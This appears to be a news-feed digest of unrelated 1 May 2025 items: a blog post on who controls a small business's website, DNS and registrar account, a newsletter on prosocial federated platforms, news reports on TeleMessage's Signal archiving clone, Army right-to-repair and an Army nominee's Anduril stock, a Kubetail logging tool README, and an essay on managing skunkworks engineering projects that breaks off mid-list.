Some thoughts on how control over web content works
Rachel By The Bay
rachelbythebay.com
2025-05-01 20:42:43
During the lockdown of 2020 and subsequent Twilight Zone times that
followed, I learned a bit about how a local restaurant's web site
operates. That web site had become the lifeline for the business since
everything had turned into takeout or delivery, and it wasn't always
right, so I brought it up with the owner. He said he had "a guy who
takes care of it". This makes sense since his thing was running a
restaurant and keeping that going. He doesn't sit around dealing with
domain names and web sites every day.
At one point "his guy" became unreachable for several months, and the restaurant owner asked me what his options were since he knew I was "one of these computer people". I had to lay out, top to bottom, how this stuff works in terms of "this content gets displayed with this name on it", and figured it might benefit others if I put some variant of it online.
Let's say you're the restaurant owner. You're paying some third party to
run a web site and list your menu, hours, and that kind of stuff. They
might also have some kind of thing rigged up to send orders through
online, or an agreement with yet another vendor to do it through them.
You need to get something changed on the site. Maybe your menu changed
and you need to warn people about the increased price of egg-based
products. Maybe you have new hours of operation. Whatever. What
steps can make that happen?
In no particular order, an incomplete list:
"Ask them to change it" - contact your person (people) and ask them to
change it. That's what you're paying them for. You are paying them,
right?
"Change the actual files" - find out how the serving of content works,
gain access to it, and then make changes to the file(s). This requires
account access to whatever they happen to be using to run the site. If
it's just a bunch of flat files on a disk somewhere, it might be easy.
If it's just one entry in a much bigger system, it might not. Also you
have to know how to do this and/or have new people to do this for you
(as with most of the entries in this list).
"Replace the document root" - figure out how the web server works, then
swing your-restaurant.example.com around from their directory to your
directory, or do the equivalent database wrangling if it's some dynamic
thing. This requires some admin powers on the box/system itself.
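As a concrete sketch: if the site happens to be served by nginx, the change can be a single directive in the site's config (the hostname and both paths here are made up for illustration):

server {
    listen 80;
    server_name your-restaurant.example.com;
    # repoint the document root from the old maintainer's directory
    # to one you control (both paths are hypothetical)
    root /srv/www/your-restaurant;
    index index.html;
}

A config reload (e.g., "nginx -s reload") picks up the change.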
"Take over the server" - gain admin powers on the box through security
holes or good old-fashioned physical access and single-user mode. Then
go in and change the document root, edit the files, or do whatever else
you feel like doing. Requires security skills and/or physical access to
the server.
"Replace the server" - find out where the server is (assuming it's just
one machine) and then physically replace it with one that you control
but is otherwise configured for the right IP address(es) and whatever
else is required to serve the site. This might mean "unplug the old one
and plug a new one in on the same spot". Requires physical access to
the hosting arrangements, and if it's in the clown, yeah, forget about
it.
"Change the DNS" - get access to whatever controls the DNS zone for that
domain and repoint it to new hosting arrangements with new content
installed. This means changing things like A and AAAA records and/or
CNAMEs. Requires ability to log in to whatever's running the show.
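As an illustration, repointing the name to a new host could mean swapping in zone records like these (the addresses come from the reserved documentation ranges; your real ones would differ):

your-restaurant.example.com.  300  IN  A     203.0.113.10
your-restaurant.example.com.  300  IN  AAAA  2001:db8::10
; or, instead of the A/AAAA records, alias the name to the new host:
; your-restaurant.example.com.  300  IN  CNAME  new-host.example.net.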
"Change the primary nameservers" - get into the account at the registrar
for the domain and repoint the primary nameservers to ones where you can
set the data for the domain. Continue as above. Requires ability to
log into the registrar account.
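Either way, you can see the current state of things from the outside with standard tools (example.com standing in for the real domain):

dig +short NS example.com      # which nameservers answer for the domain
dig +short A www.example.com   # where the web host currently points
whois example.com              # which registrar has the domain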
"Move the domain to another registrar" - maybe you can't get into the
existing registrar, but maybe you can go through the transfer process to
pull it to another one where you can change the nameservers. Then you
proceed as in that option (above). Requires ability to transfer a
domain, which typically involves a one-time key from the "losing"
registrar, which in turn usually involves access to the account. There
may be legal options for *yoinking* the domain without such access,
assuming you can prove ownership, or otherwise bludgeon the companies
involved into doing what you want.
Basically, if you actually own some of the items in question, you have
options. If you are the owner of the registrar account and it's just
some rando tech person who's a contact on it that does the work, you
authenticate yourself to the registrar out of band, have them removed,
get yourself (or a new tech rando) installed, and continue from there.
The same applies for the DNS serving, or the actual web hosting.
This pattern pretty much plays out everywhere: is it your account? Or,
did you pay them to "take care of everything" and your only "interface"
to it is through them?
I don't think people really know the implications of some of these
setups.
Building an Open Prosocial Web
Internet Exchange
internet.exchangepoint.tech
2025-05-01 13:23:17
What if online platforms were designed to strengthen our social fabric? This week, in our main story, Audrey Tang—Taiwan’s Cyber Ambassador-at-Large, first Digital Minister, and a pioneer of civic tech—and IX’s Audrey Hingle explore how federated platforms can prioritize social cohesion.
But first...
Introducing “The Stack” – Internet Exchange’s New Bookshop
This week IX launched The Stack, a place to find hand-picked reading lists on internet governance, digital rights, and the intersection of technology and society. Plus, 10% of every sale supports our newsletter. Our debut list comes from the infrastructure reading group run by the critical infrastructure lab: a bi-weekly meetup that explores the politics, values, and power dynamics embedded in communication infrastructures.
We asked Niels ten Oever, researcher at the University of Amsterdam and convenor of the reading group, to spotlight a few essentials for newcomers:
Technology of Empire, Balkan Cyberia, The Closed World [not available in our shop], and Reluctant Power
are my favorite books from the reading group. It isn't an accident that these are historical books about infrastructures. They analyze power dynamics in communication networks when the dust has settled. Oftentimes, it is difficult to understand contemporary issues because of all the hype and obfuscation. This reading group taught me that to understand the present, we need to read about networks and technologies from the past, and not be blinded by claims about utopic or dystopian futures. Power and infrastructures are historically deeply entangled – the present is not as new as we tend to think!
If you find our emails useful, consider becoming a paid subscriber! You'll get access to our members-only Signal community where we share ideas, discuss upcoming topics, and exchange links. Paid subscribers can also leave comments on posts and enjoy a warm, fuzzy feeling.
Not ready for a long-term commitment? You can always leave us a tip.
The Global Cyber Alliance’s Domain Trust initiative is evolving into an “observatory of action” to collaboratively define and measure effective practices against domain abuse, following strong stakeholder support at its 13th community meeting.
https://globalcyberalliance.org/domain-trust-dctm13
Private group chats on encrypted apps like Signal, led by tech figures such as Marc Andreessen and Sriram Krishnan, have quietly shaped a powerful alliance between Silicon Valley elites and the political right, influencing U.S. discourse and strategy from behind the scenes.
https://www.semafor.com/article/04/27/2025/the-group-chats-that-changed-america
After the U.S. government announced a brief funding extension in mid-April, the CVE Foundation announced further plans to move from sole U.S. government funding to a globally supported, independent nonprofit model.
https://www.thecvefoundation.org
Researchers have uncovered a set of vulnerabilities, dubbed AirBorne, that allow hackers on the same Wi-Fi network to remotely execute code on millions of third-party Apple AirPlay-enabled devices.
https://www.wired.com/story/airborne-airplay-flaws
IndieSky: a working group to build & run community-owned pieces of the AT Protocol stack. Free Our Feeds is supporting the effort with an initial donation. Join the working group! First call
May 8, 9am PST. Online.
https://atprotocol.dev/p/2c5705d3-8755-4be8-b386-557ccba31e94
At the meeting “Memory safety in the EU”, leading organizations in the Secure by Design & Memory Safety space will gather to draft a statement outlining the importance of Memory Safety for Europe’s critical infrastructure and its urgency as part of Secure by Design policy.
May 15, 9:30am CEST. Utrecht, Netherlands.
https://rustweek.org/events/memory-safety-eu
2025 Global Gathering is a three-day event focused on tech and human rights, bringing together global civil society, technologists, and funders to address censorship, surveillance, AI, and internet governance through participant-led sessions.
September 8–10. Estoril, Portugal.
https://www.digitalrights.community/blog/2025-global-gathering-application
OARC45: Technical meeting hosted by DNS-OARC, focused on DNS operations, research, and analysis, bringing together experts to share updates and challenges in the DNS ecosystem.
October 7–8. Stockholm, Sweden.
https://indico.dns-oarc.net/event/55
IEEE Cybersecurity Award for Practice: Nominate individuals or small teams to recognize impactful, real-world contributions to cybersecurity by
May 30.
https://secdev.ieee.org/2025/awards
In the recent research paper Prosocial Media, E. Glen Weyl, Luke Thorburn, Emillie de Keulenaar, Jacob Mchangama, Divya Siddarth, and Audrey Tang (co-author of this piece) propose a new approach to platform design that places social cohesion at the centre of online communication. The framework challenges the way most major platforms are currently designed; specifically, how they prioritize keeping users engaged by promoting content that drives clicks, often through outrage or controversy.
The paper argues that while social media platforms draw heavily on the “social fabric”, the network of relationships, affiliations and shared beliefs that structure human communities, they also often undermine it. This is especially true for platforms driven by advertising incentives, which are designed to maximise user attention through emotionally charged, often polarizing content. In contrast, the model proposed in Prosocial Media encourages algorithmic curation based on how well content bridges divides between communities, or fairly represents diverse perspectives.
The Role of Federated Platforms
Federated systems like Mastodon and Bluesky are often cited as promising alternatives to centralized platforms. Their decentralized architecture enables greater autonomy and diversity of governance models. However, we emphasize that decentralization alone isn’t enough. Decentralization changes who controls the infrastructure, but not how that infrastructure shapes social interaction. Without intentional design choices to support dialogue across communities, federated platforms risk replicating the same social fragmentation seen in their centralized counterparts. This makes the current phase of platform development especially significant. As many federated platforms like Bluesky remain in their early stages, there is an opportunity for communities to innovate their own governance solutions, and to embed prosocial principles into their infrastructure.
Current centralized social platforms often amplify division and lack transparency, creating a need for alternatives like "Prosocial Media" built on federated principles: decentralized systems that can connect and interact with one another without relying on a central company.
This approach aims to foster understanding and societal health not by arbitrating truth, but by illuminating where people may agree and disagree. It helps make the social context of information visible to reveal "uncommon ground" and build stronger communities and collective resilience.
There is a tension between transparency and privacy. Federated systems try to respect context, empowering individuals and communities to control what data they share and helping them gain clarity within their chosen groups (e.g., "Here is what your communities X and Y agree on"). The goal is to go beyond connecting individuals, and instead nurture real communities through interoperable technology based on open protocols, requiring careful, iterative development to weave a healthier social fabric online.
To realize the promise of a healthier, more coherent digital public space, federated platforms should actively design for prosocial outcomes that strengthen the social fabric.
Highlight content that bridges communities
Design algorithms that prioritize content supported by people from different communities or perspectives. This type of content can help reduce polarization and support shared understanding. Tools like Polis and Community Notes offer useful models for identifying and surfacing this kind of broadly supported content.
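As a toy sketch of what that could look like (illustrative only; Polis and Community Notes use more sophisticated matrix-factorization methods over voting data), a feed could score each post by its lowest approval rate across the communities that reacted to it, so only content endorsed across groups rises:

from collections import defaultdict

def bridging_score(reactions):
    # reactions: list of (community, approved) pairs for one post.
    # A post scores high only if *every* community that engaged with it
    # tends to approve of it; divisive content scores near zero.
    totals = defaultdict(int)
    approvals = defaultdict(int)
    for community, approved in reactions:
        totals[community] += 1
        if approved:
            approvals[community] += 1
    if len(totals) < 2:
        return 0.0  # can't demonstrate bridging within a single community
    return min(approvals[c] / totals[c] for c in totals)

# A post approved by both communities outranks a polarizing one:
bridgy = [("a", True), ("a", True), ("b", True), ("b", True), ("b", False)]
polar = [("a", True), ("a", True), ("b", False), ("b", False)]
assert bridging_score(bridgy) > bridging_score(polar)

Taking the minimum (rather than the average) is what makes the score "bridging": a post cannot climb the feed on enthusiastic support from one side alone.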
Label content with social context
Include labels or metadata that show which communities a piece of content appeals to or challenges. This kind of transparency helps users understand how content fits into broader conversations and reduces the false impression that certain views are universally accepted.
Encourage cross-community interaction
Create features that make it easier for people to encounter and engage with ideas outside their immediate circles. This could include curated feeds that show diverse viewpoints, prompts to explore related communities, or spaces for respectful dialogue across groups.
Support new and underrepresented communities
Provide tools and infrastructure that help smaller or emerging communities participate fully in the network. This might include discovery tools, moderation support, or funding models that help them grow and contribute meaningfully to the larger ecosystem.
Adopt shared standards for prosocial signals
To make these prosocial features work across the Fediverse, platforms should agree on common standards for things like content labels, community signals, and cross-platform feedback. Protocols like Spritely could help support this kind of interoperable infrastructure.
Embedding these principles into the DNA of federated platforms is a chance to reimagine the digital commons as a space where shared understanding, respectful disagreement and collective flourishing are not side effects, but core design principles.
Mike Waltz Accidentally Reveals Obscure App the Government Is Using to Archive Signal Messages
404 Media
www.404media.co
2025-05-01 22:25:23
A photograph of Trump administration official Mike Waltz's phone shows him using an unofficial version of Signal designed to archive messages during a cabinet meeting.
Mike Waltz, who was until Thursday U.S. National Security Advisor, has inadvertently revealed he is using an obscure and unofficial version of Signal that is designed to archive messages, raising questions about what classification of information officials are discussing on the app and how that data is being secured, 404 Media has found.
On Thursday Reuters published a photograph of Waltz checking his mobile phone during a cabinet meeting held by Donald Trump. The screen appears to show messages from various top-level government officials, including JD Vance, Tulsi Gabbard, and Marco Rubio.
At the bottom of Waltz’s phone’s screen is a message that looks like Signal’s regular PIN verification message. This sometimes appears to encourage users to remember their PIN, which can stop people from taking over their account.
But the message is slightly different: it asks Waltz to verify his “TM SGNL PIN.” This is not the message that is displayed on an official version of Signal.
Instead TM SGNL appears to refer to a piece of software from a company called TeleMessage which makes clones of popular messaging apps but adds an archiving capability to each of them. A page on TeleMessage’s website tells users how to install “TM SGNL.” On that page, it describes how the tool can “capture” Signal messages on iOS, Android, and desktop.
The original image and then a zoomed-in version. Both images credit: REUTERS/Evelyn Hockstein TPX IMAGES OF THE DAY.
In a video uploaded to YouTube, TeleMessage says it works on corporate-owned devices as well as bring-your-own-device (BYOD) phones. In the demonstration, two phones running the app send messages and attachments back and forth, and participate in a group chat.
The video claims that the app keeps “intact the Signal security and end-to-end encryption when communicating with other Signal users.”
“The only difference is the TeleMessage version captures all incoming and outgoing Signal messages for archiving purposes,” the video continues.
In other words, the robust end-to-end encryption of Signal as it is typically understood is not maintained, because the messages can be later retrieved after being stored somewhere else. At one point, the video shows copies of those messages in what appears to be an ordinary Gmail account, which would create additional security risks. The video says the Gmail is for the “demo” and that TeleMessage works with “numerous archiving platforms.”
“Let us take care of your Signal archiving and recording requirements,” the video concludes.
The fact that Waltz is using the TeleMessage version of Signal highlights some of the tension and complexity associated with high-ranking government officials communicating about sensitive topics on an app that can be configured to have disappearing messages: Government officials are required to keep records of their communications, but archiving, if not handled correctly, can potentially introduce security risks to those messages.
Neither TeleMessage, Signal, nor representatives of the U.S. government responded to a request for comment.
404 Media found numerous U.S. government contracts that mention TeleMessage specifically. One for around $90,000 from December 2024 says “Telemessage (a Smarsh Co.) Licenses for Text Message Archiving, & WhatsApp and Signal Licenses.”
On Thursday Waltz was pushed out from his role as national security advisor and is now instead Trump’s nominee for ambassador to the United Nations, multiple media outlets reported. Waltz was at the center of a political and national security firestorm when he accidentally added Jeffrey Goldberg, the editor-in-chief of The Atlantic, to a Signal group chat of senior Trump administration officials discussing specific combat plans against Houthi rebels in Yemen. Later the New York Times reported on a second Signal group chat in which Defense Secretary Pete Hegseth shared more highly sensitive information with third parties including his wife and brother.
One concern from those group chats was that government officials may not be following record keeping laws for government communications by using Signal. TeleMessage may solve that problem. In the YouTube video, TeleMessage says users of its Signal archiving tool will remain “compliant with regulations” and that the tool supports “full company archival compliance.”
Government agencies have paid for versions of encrypted messaging apps that also have archive abilities before. In 2021, Customs and Border Protection (CBP) paid encrypted app company Wickr $700,000. Wickr offers an enterprise version of its product that can archive messages for auditing purposes. That deal was with the encrypted app developer itself, and not a third party like TeleMessage.
Matthew Gault provided additional reporting.
About the author
Joseph is an award-winning investigative journalist focused on generating impact. His work has triggered hundreds of millions of dollars worth of fines, shut down tech companies, and much more.
Show HN: Kubetail – Real-time log search for Kubernetes
Kubetail is a general-purpose logging dashboard for Kubernetes, optimized for tailing logs across multi-container workloads in real-time. With Kubetail, you can view logs from all the containers in a workload (e.g. Deployment or DaemonSet) merged into a single, chronological timeline, delivered to your browser or terminal.
The primary entry point for Kubetail is the kubetail CLI tool, which can launch a local web dashboard on your desktop or stream raw logs directly to your terminal. Behind the scenes, Kubetail uses your cluster's Kubernetes API to fetch logs directly from your cluster, so it works out of the box without needing to forward your logs to an external service first. Kubetail also uses your Kubernetes API to track container lifecycle events in order to keep your log timeline in sync as containers start, stop or get replaced. This makes it easy to follow logs seamlessly as user requests move from one ephemeral container to another across services.
Our goal is to build the most powerful, user-friendly logging platform for Kubernetes and we'd love your input. If you notice a bug or have a suggestion please create a GitHub Issue or send us an email (hello@kubetail.com)!
Features
Clean, easy-to-use interface
View log messages in real-time
Filter logs by:
Workload (e.g. Deployment, CronJob, StatefulSet)
Absolute or relative time range
Node properties (e.g. availability zone, CPU architecture, node ID)
Grep
Uses your Kubernetes API to retrieve log messages so data never leaves your possession (private by default)
Web dashboard can be installed on desktop or in cluster
Switch between multiple clusters (Desktop-only)
Quickstart (Desktop)
Option 1: Homebrew
First, install the Kubetail CLI tool (kubetail) via homebrew:
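# assuming the project publishes its Homebrew formula under the name "kubetail"
brew install kubetail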
Next, start the web dashboard using the serve subcommand:
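# starts the dashboard server and opens it in your default browser
kubetail serve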
This command will open http://localhost:7500/ in your default browser. Have fun viewing your Kubernetes logs in realtime!
First, create a namespace for the Kubetail resources:
kubectl create namespace kubetail-system
Next, choose your authentication mode (cluster or token) and apply the latest manifest file:
# For cluster-based authentication use kubetail-clusterauth.yaml:
kubectl apply -f https://github.com/kubetail-org/helm-charts/releases/latest/download/kubetail-clusterauth.yaml

# For token-based authentication use kubetail-tokenauth.yaml:
kubectl apply -f https://github.com/kubetail-org/helm-charts/releases/latest/download/kubetail-tokenauth.yaml
To access the web dashboard you can use your usual access methods such as kubectl port-forward:
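# the service name and port below are assumptions; verify with
# `kubectl get svc -n kubetail-system` and adjust accordingly
kubectl port-forward -n kubetail-system svc/kubetail-dashboard 8080:8080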
To install Kubetail using Glasskube, you can select "Kubetail" from the "ClusterPackages" tab in the Glasskube GUI then click "install" or you can run the following command:
glasskube install kubetail
Once Kubetail is installed you can use it by clicking "open" in the Glasskube GUI or by using the open command:
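glasskube open kubetail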
Have fun viewing your Kubernetes logs in realtime!
We're building the most user-friendly, cost-effective, and secure logging platform for Kubernetes and we'd love your contributions! Here's how you can help:
A new memo from Secretary of Defense Pete Hegseth is calling on defense contractors to grant the Army the right-to-repair. The Wednesday memo is a document about “Army Transformation and Acquisition Reform” that is largely vague but highlights the very real problems with IP constraints that have made it harder for the military to repair damaged equipment.
Hegseth made this clear at the bottom of the memo in a subsection about reform and budget optimization. “The Secretary of the Army shall…identify and propose contract modifications for right to repair provisions where intellectual property constraints limit the Army's ability to conduct maintenance and access the appropriate maintenance tools, software, and technical data—while preserving the intellectual capital of American industry,” it says. “Seek to include right to repair provisions in all existing contracts and also ensure these provisions are included in all new contracts.”
Over the past decade, corporations have made it difficult for people to repair their own stuff and, somehow, the military is no exception. Things are often worse for the Pentagon. Many of the contracts it signs for weapons systems come with decades-long support and maintenance clauses. When officials dig into the contracts they’ve often found that contractors are overcharging for basic goods or intentionally building weapons with proprietary parts and then charging the Pentagon exorbitant fees for access to replacements. 404 Media wrote more about this problem several months ago. The issue has gotten so bad that appliance manufacturers and tractor companies have lobbied against bills that would make it easier for the military to repair its equipment.
This has been a huge problem for decades. In the 1990s, the Air Force bought Northrop Grumman’s B-2 Stealth Bombers for about $2 billion each. When the Air Force signed the contract for the machines, it paid $2.6 billion up front just for spare parts. Now, for some reason, Northrop Grumman isn’t able to supply replacement parts anymore. To fix the aging bombers, the military has had to reverse engineer parts and do repairs themselves.
Similarly, Boeing screwed over the DoD on replacement parts for the C-17 military transport aircraft to the tune of at least $1 million. The most egregious example was a common soap dispenser. “One of the 12 spare parts included a lavatory soap dispenser where the Air Force paid more than 80 times the commercially available cost or a 7,943 percent markup,” a Pentagon investigation found. Imagine if they’d just used a 3D printer to churn out the part it needed.
As the cost of everything goes up, making it easier for the military to repair their own stuff makes sense. Hegseth’s memo was praised by the right-to-repair community. “This is a victory in our work to let people fix their stuff, and a milestone on the campaign to expand the Right to Repair. It will save the American taxpayer billions of dollars, and help our service members avoid the hassle and delays that come from manufacturers’ repair restrictions,” Isaac Bowers, the Federal Legislative Director of U.S. PIRG, said in a statement.
The memo would theoretically mean that the Army would refuse to sign contracts with companies that make it difficult to fix what it sells to the military. The memo doesn’t carry the force of law, but subordinates do tend to follow the orders given within. The memo also ordered the Army to stop producing Humvees and some other light vehicles, and Breaking Defense confirmed that it had.
With the Army and the Pentagon returning to an era of DIY repairs, we’ll hopefully see the return of PS: The Preventive Maintenance Monthly. Created by comics legend Will Eisner in 1951, the Pentagon-funded comic book was a monthly manual for the military on repair and safety. It included sultry M-16 magazines and anthropomorphic M1-Abrams explaining how to conduct repairs.
The Pentagon stopped publishing the comic in 2019, but with the new push in the DoD for right-to-repair maybe we’ll see its return. It’s possible in the future we’ll see a comic book manual on repairing a cartoon MQ-9 Reaper that leers at the reader with a human face.
Image via The Internet Archive.
About the author
Matthew Gault is a writer covering weird tech, nuclear war, and video games. He’s worked for Reuters, Motherboard, and the New York Times.
Trump's Pick for a Top Army Job Works at a Weapons Company — And Won't Give Up His Stock
Intercept
theintercept.com
2025-05-01 21:30:22
Mike Obadal’s plan to keep his stock in Anduril if nominated as under secretary of the Army is a blatant conflict of interest, experts say.
Trump’s nominee for under secretary of the Army, Michael Obadal, retired from a career in the Army in 2023, then spent the past two years working for Anduril, the ascendant arms maker with billions of dollars in Army contracts.
If confirmed to the Pentagon post — often described as the “chief operating officer” position at the largest branch of the U.S. military — Obadal plans to keep his stock in Anduril, according to an ethics disclosure reviewed by The Intercept.
“This is unheard of for a presidential appointee in the Defense Department to retain a financial interest in a defense contractor,” said Richard Painter, the top White House ethics lawyer during the George W. Bush administration. Painter said that while the arrangement may not be illegal, it certainly creates the appearance of a conflict of interest. Under the norms of prior administrations, Painter said, “nobody at upper echelons of the Pentagon would be getting anywhere near contracts if he’s sitting on a pile of defense contractor stock.”
Obadal has been a senior director at Anduril since 2023, according to his LinkedIn profile, following a nearly 30-year career in the U.S. Army. While the revolving door between the Pentagon and defense industry is as old as both of those institutions, federal law and ethical norms require employees of the executive branch to unload financial interests and relationships that might create a conflict of interest in the course of their duties.
Obadal’s April 11 financial disclosure letter, filed with the Office of Government Ethics, states “Upon confirmation, I will resign from my position as Senior Director at Anduril Industries” and forfeit his right to unvested stock options. But crucially, Obadal says he will retain his restricted stock units that have already vested — i.e., Anduril stock he already owns. That means he will continue to own a piece of the company, whose valuation has reportedly increased from $8.5 billion when Obadal joined to $28 billion today on the strength of its military contracts, and stands to materially benefit from anything that helps Anduril.
In his ethics letter, Obadal says he “will not participate personally and substantially in any particular matter that to my knowledge has a direct and predictable effect on the financial interests of Anduril Industries” — unless he’s given permission by his boss, the secretary of the Army.
Don Fox, former acting director of the Office of Government Ethics, told The Intercept Obadal’s Anduril shares could pose a clear conflict of interest if he is confirmed. “The general reason an appointee would be allowed to maintain a potentially conflicting interest is because divestiture is either not possible or highly impractical.” Anduril is privately held, meaning shares in the company can’t be quickly disposed of on the stock market.
But Painter, the Bush-era ethics lawyer, suggests that Obadal could liquidate his stake in Anduril through the lively secondary market in its shares. “In the Bush years, we’d just say ‘You’re not going to the Pentagon,’” said Painter.
Fox said that if Obadal adheres to what’s in his ethics agreement and recuses himself from anything that touches Anduril, he will stay in compliance with federal law. “That’s going to be a pretty broad recusal,” added Painter, who speculated, “He’s going to have to recuse from any weapons systems that might use [Anduril] equipment, anything having to do with contracts, even competitor companies.”
Fox, who spent decades as a lawyer at the Air Force and Navy, speculated that a vast recusal from budgetary matters “is feasible, but he’s going to have to be really scrupulous about it,” to the point of literally leaving the room whenever Anduril, its capabilities, or those of its competitors are discussed. “Once we get into areas that involve hardware and software, I’d say don’t even be in the room,” he said. “At a really senior level, people are not only looking for what you say but what you don’t say,” Fox added. “It poses a significant risk to him personally of crossing that line, no matter how scrupulous he may be.”
William Hartung, a senior research fellow at the Quincy Institute for Responsible Statecraft who focuses on the U.S. arms industry, describes the situation as “the very definition of a conflict of interest” given the vast business interests between Obadal’s current and new employer. “The fact that the administration and the Congress have accepted this arrangement is a commentary on the sad state of ethics in Washington — an indication that too many of our elected officials won’t even try to take steps to make it harder to engage in corrupt practices,” Hartung added.
As its second-highest-ranking civilian at the Army, Obadal will have considerable sway over what weapons the Army purchases, what technologies it prioritizes, and when and how the U.S. wages war. Having a former employee and current shareholder in that position may prove lucrative for Anduril as the company seeks to add to its billions of dollars of federal contracts.
In the past year alone, during Obadal’s time at the company, Anduril announced it was taking over the Army’s Integrated Visual Augmentation System, a troubled $22 billion program intended to provide soldiers with augmented reality goggles, and began selling the Army components for its rocket artillery systems and a fleet of miniature “Ghost-X” helicopter drones. Anduril is also working on the Army’s TITAN system, a truck-mounted sensor suite, and the U.S. Army’s experimental Robotic Combat Vehicle program.
Last year, DefenseOne reported that the Army’s “unfunded priorities” tech wishlist included “$4.5 million in research and development for Anduril’s Roadrunner-M drone interceptor.” Obadal described that jet-powered bomb drone in a LinkedIn post as “revolutionary.”
The White House declined to comment on the ethics agreement and referred The Intercept to the Office of the Secretary of Defense, which also declined to comment and referred The Intercept to the Army, which referred The Intercept back to the White House. Neither Anduril nor Obadal responded to a request for comment.
In December, the New York Times reported Trump’s transition team offices were “crawling with executives from defense tech firms with close ties to Mr. Trump’s orbit,” including Anduril. The month before, Anduril co-founder and longtime Trump booster Palmer Luckey told Bloomberg he was already “in touch” with the incoming administration about impending nominees: “I don’t want to throw any (names) out there because I would be happy with all of them.”
Since moving from academic research to industry in 2017, I’ve worked on two software projects. Each one started as a small, clean-slate[1] skunkworks effort involving 2-3 people and gradually expanded to a large, conventional software engineering effort with dozens of engineers. The first of these (from 2017 to 2021) was Delos at Meta, a Chubby/ZooKeeper/etcd-like control plane storage system. The second was a new Kafka engine (from 2022 to 2024) that can run on any disaggregated storage layer (and powers the Confluent Freight product, where S3 is used as that storage layer). Nearly every system at Meta depends in some way on Delos as of 2025 (e.g., this article describes an example dependency chain); Confluent Freight just became generally available and time will tell if it succeeds commercially, though early results are promising.
While these systems were technically difficult to build and operate (particularly given their critical roles in the stacks of the respective companies), I found that much of the challenge lay in the management of these projects. Even the most innovative companies on the planet have incentive structures (for line managers and engineers) that are incompatible with clean-slate skunkworks innovation. In my discussions with various managers over the last few years, I found myself converging on a set of key principles, which I outline in this article. I hope these rules are helpful for other engineers and managers looking to define a shared set of principles for their own skunkworks projects.
Some caveats: I am an engineer, not a manager, and have never managed anything in my life beyond a handful of interns and graduate students; this is just my wish-list as a technical project lead / architect for what I need from managers. These rules may be highly specific to building new storage services at large companies. At some point, the project has to exit skunkworks mode and these rules cease to apply. My sample size is N=2 and it’s difficult to establish that these rules are causally related (or even just correlated) to project success.
A. No non-coding architects:
If you want to participate in designing the system, you have to write code. (Note that it’s okay to not code if you are bringing some particular expertise to the table: e.g., if you are a world-class erasure coding theorist. It might also be okay if you are a world-class ops specialist, though in my experience most such people are very comfortable with code). If there’s anyone on the team whose only job is to delegate work to other people, something has gone extremely wrong.
B. No individual “ownership”:
Everyone is responsible for everything. If the boat sinks, everyone sinks with it; there’s no way to win or lose independently. We want people accelerating and enabling each other to expand the pie, not competing with each other on a fixed pie. We want zero tolerance for self-promoting activity: it is the job of the manager and the TLs to make sure that people are rewarded fairly based on what they actually did. The best managers of such teams tell them to run as fast as possible and get the job done; and take the burden of justifying ratings completely off the engineers. If the need to safeguard an engineer’s rating begins to shape the project’s priorities, something has gone extremely wrong.
C. Operate on strengths, not weaknesses:
We want each person to focus on what they are truly good at; rather than what they are weakest at. The latter often happens in a big company setup when engineers want to get promoted; and managers tell them to focus on the areas that are holding them back. If engineers ask managers what will get them promoted, the answer has to be “run as fast as you can and make the team ship”. If that person cannot get objectively promoted under those circumstances, something has gone extremely wrong: the project is not impactful enough to warrant a skunkworks approach; or the person should not be on this project (e.g., maybe their skillset is not needed on the project, or they are not good enough in their assumed area of expertise, etc.).
D. Formal communication (exposed outside the team) has to be extremely precise, high-quality, and reviewed:
To paraphrase Jeff Bezos, we want “crisp documents and messy meetings”. Different constituencies need different types of messaging: some may need to know about technically impressive details; others may want to know about business impact; some may need to know what’s happening next month and others may need to know what’s happening in 3 years. Writing a single document with that kind of versatility takes months even for experienced writers. Everything the team says publicly impacts its reputation and credibility; and constrains its actions in the future. Note that this is not at odds with transparency: informal communication should happen at all levels with the utmost transparency, since it’s typically easy to convey nuance and context when discussing things informally.
E. Avoid a first-doc-wins culture.
Having a single person write a public-facing doc has a chilling effect on design engagement within the team; it “muddies the pool”. We want less experienced members of the team to experience the rush of discovering (or re-discovering) ideas; it’s a part of the training process. Public-facing docs should be written after a design process and authored collaboratively. We should not reward docs as deliverables. (None of this applies to internal communication within the team, which can happen in any form and quality level that the team likes).
F. Reward on impact:
Everyone on the team has the same rules: they will be rewarded when the project ships in some form. No promotions until something ships (unless someone on the team is already long-due for a promotion). On the flip side, we guarantee reasonable baseline ratings even if there’s no shipped impact. Basically we take out both the upside and the downside for engineers until something ships.
G. Minimize dependencies:
Dependencies take a lot of time (external teams often have multiple priorities). They can create uneven quality across the project. Air-gaps can show up in the design. One failure mode is that external teams often specialize in specific solutions rather than a problem domain; so asking an external team to “build a component to solve X” often translates into “modify our existing solution Y to solve X”, which can add a ton of accidental complexity. Note that “reward on impact” incentives force the team to be careful about dependencies: if they do their job perfectly but a dependency fails to show up, the team does not get rewarded. In practice, this ensures that the team only takes a dependency if it absolutely makes sense and they are comfortable with the risk profile.
H. Understand the hierarchy of needs for a new project:
For some technical problems, the slope of progress is continuous: it’s easy to get an initial version that works somewhat well and then incrementally improve it, but quite hard to get to an ideal version (e.g., a multi-tenant load-balancer can require years of tinkering with policies). Other problems have a discrete progression: it’s difficult to get to a reasonable v0, but after that you can pretty much leave it alone (e.g., a consensus protocol that’s only used on reconfigurations). In a mature 1-to-10 system, managers and engineers will spend most of their time on the former class of problems; as a result, it may be tempting to prioritize the same problems in a 0-to-1 system. But in a brand new database (for example), it’s far more important to have a working consensus protocol than to have excellent load-balancing in your first release.
I. Hire Pigs, not Chickens:
Pigs are full-time engineers committed to a project, whereas Chickens are part-time engineers involved in the project. We want to bias towards a small number of Pigs rather than a larger number of Chickens. Note that this is not a question of competence: even the best Chicken can hurt velocity and undermine the sense of shared fate in a project.
J. Eliminate process ruthlessly:
This one should be obvious: a small team does not need process. Do not impose any make-work activity on the team. Free them up to execute. A manager’s role in this setup is to provide inspirational leadership and motivate the troops, rather than manage / limit risk.
K. Progressively overload the team:
Pick goals for the team that are ambitious and just a little bit impossible. This has two effects: one, it forces the team to prioritize ruthlessly, where you cut out anything inessential for success; and two, it pushes the team to somehow find leverage through system design, where you find new ways to deliver the same result without as much code / complexity because you literally don’t have cycles to write the code / manage the complexity.
L. Do not exit skunkworks mode prematurely:
